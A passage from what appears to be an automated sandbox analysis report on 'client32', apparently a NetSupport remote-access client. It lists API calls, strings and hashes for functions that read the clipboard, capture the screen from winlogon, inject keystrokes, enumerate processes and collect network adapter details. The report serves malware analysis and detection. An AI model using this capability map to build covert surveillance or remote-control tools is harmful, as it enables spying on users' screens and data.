                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                              Strings
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                              • String ID: NSMClassList$NSMFindClassEvent
                                                                              • API String ID: 1622498684-2883797795
                                                                              APIs
                                                                              • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                              • GetClipboardData.USER32(?), ref: 1103337D
                                                                              • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                              • GetLastError.KERNEL32 ref: 11033406
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                              Strings
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                              • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                              • API String ID: 1861668072-1296821031
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                              • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                              Strings
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock
                                                                              • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                              • API String ID: 2752051264-327499879
                                                                              APIs
                                                                              Strings
                                                                              • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                              • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountIconicTick
                                                                              • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                              • API String ID: 1307367305-2838568823
                                                                              APIs
                                                                              • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                              • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                              • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                              • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$BringCurrentIconicShowThread
                                                                              • String ID:
                                                                              • API String ID: 4184413098-0
                                                                              APIs
                                                                              • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                              • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ControlDevicekeybd_event
                                                                              • String ID:
                                                                              • API String ID: 1421710848-0
                                                                              • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                              • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                              • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                              • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                              APIs
                                                                              • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                              • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$DataFormatName
                                                                              • String ID:
                                                                              • API String ID: 3172747766-0
                                                                              • Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                              • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                              • Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                              • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                              • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                              • API String ID: 2942389153-3574733319
                                                                              • Opcode ID: a1f09aa51e896bd3823c6bcd84ba5b8c2eceb3d4fedcf053763cb51e93d6f7e9
                                                                              • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                              • Opcode Fuzzy Hash: a1f09aa51e896bd3823c6bcd84ba5b8c2eceb3d4fedcf053763cb51e93d6f7e9
                                                                              • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                              APIs
                                                                              • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                              • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                              • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                              • GetDC.USER32(00000000), ref: 110B31E8
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                              • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                              • GetTickCount.KERNEL32 ref: 110B323F
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                              • GetTickCount.KERNEL32 ref: 110B327F
                                                                              • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                              • GdiFlush.GDI32 ref: 110B32A2
                                                                              • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                              • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                              • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                              • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                              • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                              • API String ID: 2071925733-2101319552
                                                                              • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                              • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                              • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                              • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                              APIs
                                                                                • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                              • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • wsprintfA.USER32 ref: 1100553D
                                                                              • DeleteObject.GDI32(?), ref: 11005592
                                                                              • DeleteObject.GDI32(?), ref: 1100559B
                                                                              • SelectObject.GDI32(?,?), ref: 110055B2
                                                                              • DeleteObject.GDI32(?), ref: 110055B8
                                                                              • DeleteDC.GDI32(?), ref: 110055BE
                                                                              • SelectObject.GDI32(?,?), ref: 110055CF
                                                                              • DeleteObject.GDI32(?), ref: 110055D8
                                                                              • DeleteDC.GDI32(?), ref: 110055DE
                                                                              • DeleteObject.GDI32(?), ref: 110055EF
                                                                              • DeleteObject.GDI32(?), ref: 1100561A
                                                                              • DeleteObject.GDI32(?), ref: 11005638
                                                                              • DeleteObject.GDI32(?), ref: 11005641
                                                                              • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                              • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                              • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                              • API String ID: 2789700732-770455996
                                                                              • Opcode ID: 5643fefa4b39ee0fff75ee309dbb4bc87683bc06c1bf1752bbaaaa7d6b9440ae
                                                                              • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                              • Opcode Fuzzy Hash: 5643fefa4b39ee0fff75ee309dbb4bc87683bc06c1bf1752bbaaaa7d6b9440ae
                                                                              • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,EE49F673,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,75920BD0,00000000), ref: 11138283
                                                                                • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                              • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                              • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                              • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                              • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                              • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                              • API String ID: 348974188-2591373181
                                                                              • Opcode ID: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                              • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                              • Opcode Fuzzy Hash: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                              • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                              APIs
                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                              • GetDC.USER32(00000000), ref: 1105D2BB
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                              • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                              • GetTickCount.KERNEL32 ref: 1105D30F
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                              • GetTickCount.KERNEL32 ref: 1105D33C
                                                                              • GetLastError.KERNEL32(?), ref: 1105D348
                                                                              • GdiFlush.GDI32 ref: 1105D35C
                                                                              • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                              • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                              • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                              • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                              • API String ID: 652520247-4094952007
                                                                              • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                              • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                              • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                              • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                              APIs
                                                                                • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
                                                                                • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                              • wsprintfA.USER32 ref: 1102B84D
                                                                                • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
                                                                              • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
                                                                              • wsprintfA.USER32 ref: 1102B69E
                                                                              • wsprintfA.USER32 ref: 1102B705
                                                                                • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
                                                                                • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                                              • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
                                                                              • API String ID: 2153351953-120756110
                                                                              • Opcode ID: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                              • Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
                                                                              • Opcode Fuzzy Hash: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                              • Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                              APIs
                                                                              • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                              • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                              • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                              • API String ID: 3054845645-718119679
                                                                              • Opcode ID: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                              • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                              • Opcode Fuzzy Hash: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                              • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • wsprintfA.USER32 ref: 110EB5D8
                                                                              • GetTickCount.KERNEL32 ref: 110EB632
                                                                              • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                              • GetTickCount.KERNEL32 ref: 110EB64E
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                              • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                              • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                              • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                              • API String ID: 3451743168-2289091950
                                                                              • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                              • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                              • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                              • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                              • _calloc.LIBCMT ref: 1103945C
                                                                              • GetSystemMenu.USER32(?,00000000), ref: 11039490
                                                                              • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
                                                                              • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                              • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                              • UpdateWindow.USER32(00000000), ref: 11039567
                                                                              • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                              • MessageBeep.USER32(000000FF), ref: 1103957F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                              • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                              • API String ID: 4191401721-1182766118
                                                                              • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                              • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                              • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                              • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                              • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                              • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                              • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                              • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                              • _memset.LIBCMT ref: 110CB51B
                                                                              • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                              • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                              • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                              • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                              • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                              • API String ID: 2220097787-1587594278
                                                                              • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                              • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                              • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                              • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
